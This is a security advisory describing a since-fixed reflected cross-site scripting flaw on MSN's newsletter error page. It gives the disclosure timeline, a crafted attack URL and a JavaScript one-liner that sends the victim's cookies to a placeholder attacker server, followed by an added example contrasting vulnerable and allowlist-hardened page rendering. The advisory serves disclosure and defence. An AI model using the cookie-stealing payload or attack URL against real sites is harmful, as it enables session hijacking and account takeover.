Summary
A cookie-stealing cross-site scripting (XSS) vulnerability was found on MSN's
website (msn.com). An attacker who gets a logged-in victim to open a crafted
link can read the victim's cookies and use them to gain access to the
victim's Inbox.
This vulnerability was discovered by: tontonq and Nir Goldshlager.
Disclosure timeline
SecuriTeam was asked to assist the researchers with contacting Microsoft.
Reported to vendor: 18th of July, 2006.
Vendor response: 18th of July, 2006.
Resolved: 19th of July, 2006.
Public disclosure: 25th of July, 2006.
Technical description
A reflected, cookie-stealing XSS issue was discovered on MSN's web site. The
error page HMError.asp takes a CB parameter from the query string and writes
its value into the src attribute of a script tag, so a URL supplied by the
attacker is loaded and executed as script in the victim's browser.
Example of the issue:
http://newsletters.msn.com/hm/HMError.asp?CB=http://yourcookiestealer/stealer.js
If John Doe wanted to steal a victim's cookie, he could host the following
Javascript code at the URL given in CB (the /**/ comment stands in for the
space after "new", which keeps the payload free of whitespace if it is ever
carried in a URL):
i=new/**/Image();i.src='http://his_stealer/s.php?cookie='+document.cookie;
The browser requests the image URL, which sends the victim's cookies to the
attacker's server. If s.php stores the received cookie value, the attacker
can set those same cookies in his own browser and "jump" straight into the
victim's Inbox without knowing the password.
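To make the flaw and its fix concrete, the following is an added example
modelled on the pattern described above; it is not code from the advisory or
from MSN. It reproduces the vulnerable behaviour (the CB parameter is copied
into a script tag's src) beside a hardened version that only accepts a fixed
allowlist of first-party script paths. The function names, the allowlisted
paths and the fallback script are assumptions made for the example.

```javascript
// Added example, not the advisory's or MSN's code. Models an error page that
// copies a "CB" query parameter into <script src="...">, and a hardened form.
// All names and the allowlisted paths below are hypothetical.

// Parse the query string of a request URL into a plain object.
// Relative URLs are resolved against an assumed site origin.
function parseQuery(requestUrl) {
  const u = new URL(requestUrl, "http://newsletters.msn.com");
  return Object.fromEntries(u.searchParams);
}

// Vulnerable rendering: whatever CB holds becomes the script's src, so
// CB=http://yourcookiestealer/stealer.js loads attacker-controlled script
// in the site's origin, where document.cookie is readable.
function renderErrorPageVulnerable(params) {
  const cb = params.CB || "";
  return `<html><body><h1>Error</h1><script src="${cb}"></script></body></html>`;
}

// Hardened rendering: CB must exactly match one of a small set of known,
// same-origin script paths. Anything else falls back to a safe default,
// so neither an external URL nor an attribute-breaking value can reach the tag.
const ALLOWED_CALLBACK_SCRIPTS = new Set([
  "/hm/callback.js", // hypothetical first-party scripts
  "/hm/error.js",
]);
const DEFAULT_CALLBACK_SCRIPT = "/hm/error.js";

function renderErrorPageHardened(params) {
  const cb = params.CB || "";
  const src = ALLOWED_CALLBACK_SCRIPTS.has(cb) ? cb : DEFAULT_CALLBACK_SCRIPT;
  return `<html><body><h1>Error</h1><script src="${src}"></script></body></html>`;
}

// Return the script src a browser would fetch from the rendered page,
// which is the value worth checking in a regression test.
function scriptSrcOf(html) {
  const m = /<script src="([^"]*)"><\/script>/.exec(html);
  return m ? m[1] : null;
}

// Stand-alone demonstration using the attack URL from the advisory.
const ATTACK_URL =
  "http://newsletters.msn.com/hm/HMError.asp?CB=http://yourcookiestealer/stealer.js";

if (typeof require !== "undefined" && require.main === module) {
  const params = parseQuery(ATTACK_URL);
  console.log("vulnerable loads:", scriptSrcOf(renderErrorPageVulnerable(params)));
  console.log("hardened loads:  ", scriptSrcOf(renderErrorPageHardened(params)));
}
```

The allowlist is the important part: HTML-escaping CB would stop an attacker
from breaking out of the attribute, but it would not stop a well-formed
external URL from being loaded as script. Marking the session cookie HttpOnly
would additionally keep document.cookie from exposing it, but that limits the
payload rather than fixing the injection.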